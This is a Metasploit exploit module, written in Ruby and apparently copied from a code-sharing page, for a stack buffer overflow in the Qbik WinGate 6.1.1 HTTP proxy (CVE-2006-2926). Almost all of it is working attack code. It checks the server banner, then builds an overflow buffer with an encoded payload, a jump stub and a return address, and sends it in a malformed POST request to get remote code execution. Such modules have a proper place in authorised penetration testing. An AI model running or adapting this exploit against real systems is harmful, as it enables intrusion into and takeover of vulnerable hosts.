Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in Qbik WinGate version
16
        6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
17
        HTTP proxy service on port 80, a remote attacker could overflow
18
        a buffer and execute arbitrary code.
19
      },
20
      'Author'         => 'aushack',
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2006-2926' ],
25
          [ 'OSVDB', '26214' ],
26
          [ 'BID', '18312' ],
27
        ],
28
      'DefaultOptions' =>
29
        {
30
          'EXITFUNC' => 'process',
31
          'AllowWin32SEH' => true
32
        },
33
      'Payload'        =>
34
        {
35
          'Space'    => 1000,
36
          'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
37
          'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
38
          'StackAdjustment' => -3500,
39
        },
40
      'Platform'       => 'win',
41
      'Targets'        =>
42
        [
43
          [ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
44
        ],
45
      'Privileged'     => true,
46
      'DisclosureDate' => '2006-06-07',
47
      'DefaultTarget' => 0))
48

49
    register_options(
50
      [
51
        Opt::RPORT(80)
52
      ])
53
  end
54

55
  def check
56
    connect
57
    sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
58
    banner = sock.get_once || ''
59
    if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
60
      return Exploit::CheckCode::Appears
61
    end
62
    return Exploit::CheckCode::Safe
63
  end
64

65
  def exploit
66
    connect
67

68
    print_status("Trying target #{target.name}...")
69

70
    buff = Rex::Text.rand_text_alphanumeric(3000)
71
    buff[1200, 1000] = payload.encoded # jmp here
72
    buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
73
    buff[2284, 4] = [target['Ret']].pack('V') #eip
74

75
    sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"
76

77
    sock.put(sploit)
78
    sock.get_once(-1, 3)
79

80
    handler
81
    disconnect
82
  end
83
end
84

85